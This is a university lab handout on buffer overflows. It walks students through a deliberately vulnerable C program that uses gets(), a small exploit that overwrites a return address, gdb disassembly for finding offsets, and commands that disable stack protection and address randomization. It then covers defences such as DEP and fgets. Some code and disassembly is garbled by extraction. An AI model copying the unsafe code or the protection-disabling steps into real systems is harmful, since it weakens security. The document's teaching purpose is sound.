Blossom Hands-on exercises for computer forensics and security. Buffer Overflow

Size: px

Start display at page:

Download "Blossom Hands-on exercises for computer forensics and security. Buffer Overflow"

Steven Lucas
5 years ago
Views:

1 Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit Buffer Overflow BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) l.han@mmu.ac.uk

2 1. Learning Objectives This lab aims to understand buffer overflow. 2. Preparation 1) Under Linux environment 2) Some files that you will need from /home/user/blossomfiles/bufferoverflow: 'exploit.c' 'lame.c' 3) Some documents that you may need to refer to: 'Virtual-MachineGuide.pdf' Linux-Guide.pdf BLOSSOM-UserGuide.pdf 3. Tasks Setup & Installation Start a virtual machine as you have done with previous exercises (see Virtual Machine Guide) # kvm -cdrom /var/tmp/blossomfiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one Use the following set of commands to set up the C files, as well as to disable any protections against buffer overflows: # gcc -o exploit exploit.c # gcc -o lame lame.c -fno-stack-protector # echo 0 > /proc/sys/kernel/randomize_va_space

3 Task 1 Buffer Overflow 1.1 Buffer overflows are probably one of the most vicious tools available to an attacker. A small honest mistake made by a programmer with SETUID root permissions can mean catastrophe. A buffer overflow is the technique of overwriting machine code with an attackers own code, this occurs when a program takes input from a user in low-level languages without checking its size. It can be used to gain root access. In older languages, such as FORTRAN, C and C++, it's possible to over address arrays. In modern languages like Java, this is not possible. When an array is padded to a function in C, the function has no concept of the bounds; it is the programmer's responsibility to check bounds. For example: #include <stdio.h> //Include the standard input output library void somefunction(char *buf); void somefunction(char *buf){ buf[17] = `a'; //Address memory that isn't in the array. void main(void){ char buf[16]; //Declare an array of 16 chars, same as a string somefunction(buf); //Call somefunction and pass buf to it In the above example, we have assigned element 17 of array buf, but the array only has 16 elements. As the data type is a char (byte), 'a' will be written to whatever is in the adjacent byte following the array.

4 If memory locations are adjacent, then you can overwrite an adjacent variable by over addressing an array. For example: #include <stdio.h> #include <string.h> void main(void){ char buf[4]; //Declare an array of 4 characters char *b; //Declare a pointer to a character b = &buf[4] + 1; //Make b sit at the end of buf *b = 'x'; //Make char b = x printf("b is %c\n", *b); //Print b which should be x strcpy(buf, "hello"); //Copy "hello" into buf, which is longer than buf printf("b is %c\n", *b); //Print b which should be o When this program is compiled and executed, the following output is given: B is b B is o

5 1.2 Programs are given their own virtual memory space by the operating system; this allows multiple programs to run at once, it also means that the program doesn't have to deal with absolute memory addressing. Programs are given enough memory to hold all the instructions and variable space. The stack is a selection of memory shared by all the functions in a program; it uses a LIFO, last in first out format. Data is pushed on to the top of the stack, and pulled from the top. The process of calling a function is as follows: Push any data needed by the function on to the stack Jump to the location of the first instruction of the function Pull any data off the stack Run instructions Return to the given instruction location We know from the previous example that it's possible to address access other variables in the stack. It's also possible to write over the return address, such that it points to a different location. In the following example, program 2 takes user input, program 1 outputs enough random data to fill the buffer of program 2 and then overwrite the return address with 0x4005d1, the address of the function somefunction(). //Program 1 //This program exploits a buffer overflow vulnerability in program2 //address to another function #include <stdio.h> #define ID 0x4005d1 //Address of somefunction() int main(void){ char buf[(24+8)]; //setup an array of 32 chars int i; for(i = 0; i < 24; ++i) buf[i] = 'a'; //Fill array with 25x'a' *(long *) &buf[24] = ID; //Fill remainder of array with ID //cast to long (long = 8bytes) puts(buf); //output the string //Program 2 //Insecure program, should execute somefunction, and then echo input back to user.

6 #include <stdio.h> int i = 0; void somefunction(void); void lame(void); void somefunction(void){ if(i!= 0) printf("i haz been haked\n"); else printf("working as normal\n"); ++i; void lame(void){ char buf[8]; gets(buf); printf("input: %s\n", buf); int main(void){ somefunction(); lame(); When both programs are executed in the terminal as follows: #./program1./program2 The output should be: Working as normal Input: aaaaaaaaaaaaaaaaaaaaaaaa@ I haz been hacked Input: `@ Unauthorised code has been executed, somefunction() has been called twice when it shouldn't have. We should now have a basic understanding of how buffer overflows work. Try executing the files that we downloaded earlier, the program should return a Segmentation Fault. This means that the program is attempting to access memory that the CPU cannot physically address.

7 1.3 The command gdb can be used to disassemble compiled programs into their memory locations and instructions. This is essential if one is two write a program like above that can exploit successfully. Once you have identified an overflow vulnerability, you would need to use the following commands to obtain enough information to write a successful exploit: # gdb -q program2 #Load the program progname into gdb (gdb) disass main Dump of assembler code for function main: 0x cd <+0>: push %rbp 0x ce <+1>: mov %rsp,%rbp 0x d1 <+4>: callq 0x40056c <somefunction> 0x d6 <+9>: callq 0x4005a1 <lame> 0x db <+14>: pop %rbp 0x dc <+15>: retq End of assembler dump.... #Disassemble the function main, function 'lame' is called at instruction 0x4005d6 (gdb) disass lame Dump of assembler code for function lame: 0x a1 <+0>: push %rbp 0x a2 <+1>: mov %rsp,%rbp 0x a5 <+4>: sub $0x10,%rsp 0x a9 <+8>: lea - 0x10(%rbp),%rax 0x ad <+12>: mov %rax,%rdi 0x b0 <+15>: callq 0x <gets@plt> 0x b5 <+20>: lea - 0x10(%rbp),%rax 0x b9 <+24>: mov %rax,%rsi 0x bc <+27>: mov $0x4006b3,%edi 0x c1 <+32>: mov $0x0,%eax 0x c6 <+37>: callq 0x <printf@plt> 0x cb <+42>: leaveq 0x cc <+43>: retq End of assembler dump.... #Disassemble function lame, total reserver stack size for variables is 0x bytes #8 bytes padding are always included #From line <+4> #So overflow occurs at anything over 24 bytes

8 With this information, it's possible to write exploits for simple programs. Writing advanced exploits goes far beyond the scope of this document. Now that we also understand how to disassemble code and analyse the stack, let's try to actually perform a buffer overflow. Disassemble the program 'lame' using gdb and take a look at the stack. Using the knowledge gained so far from this lab, find the instruction address of a callq to a function, and then modify the file 'exploit.c' accordingly. NOTE: Stack locations can differ between students We should have a similar result to that of the example earlier. 1.4 There are many ways in which buffer overflows can be defended against, such as: Data Execution Protection Many modern processors include a feature that forbids data to be executed as code. In more complex examples, the processor would detect that data would be trying to execute, halting the process. Operating System Both Windows and Linux feature software that implements Data Execution Prevention. Sanitising Code The safest way to avoid buffer overflow exploits is to remove the possibility of over-addressing data in the first place. It was identified a long time ago that gets was unsafe. Since then, newer and safer functions have been developed such as fgets. The prototype for fgets is: char *fgets(char *s, int size, FILE *stream) For example, to copy an amount of data equal to that of the size of buf into buf, from stdin: fgets(buf, sizeof(buf), stdin); This is a safe replacement for gets Try sanitise the file 'lame.c' that was downloaded initially by using fgets instead of gets, and then recompile the code and execute it, noting the difference in result.

9 Summary Questions: 1. In your own words, explain: Buffers Buffer Overflows 2. Name a language other than Java that protects against buffer overflows 3. In your own words, using your own research, give a famous example of a buffer overflow exploit. Include technical details 4. Why is the function gets unsafe?

Linux Capabilities & Set-UID Vulnerability

Linux Capabilities & Set-UID Vulnerability Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative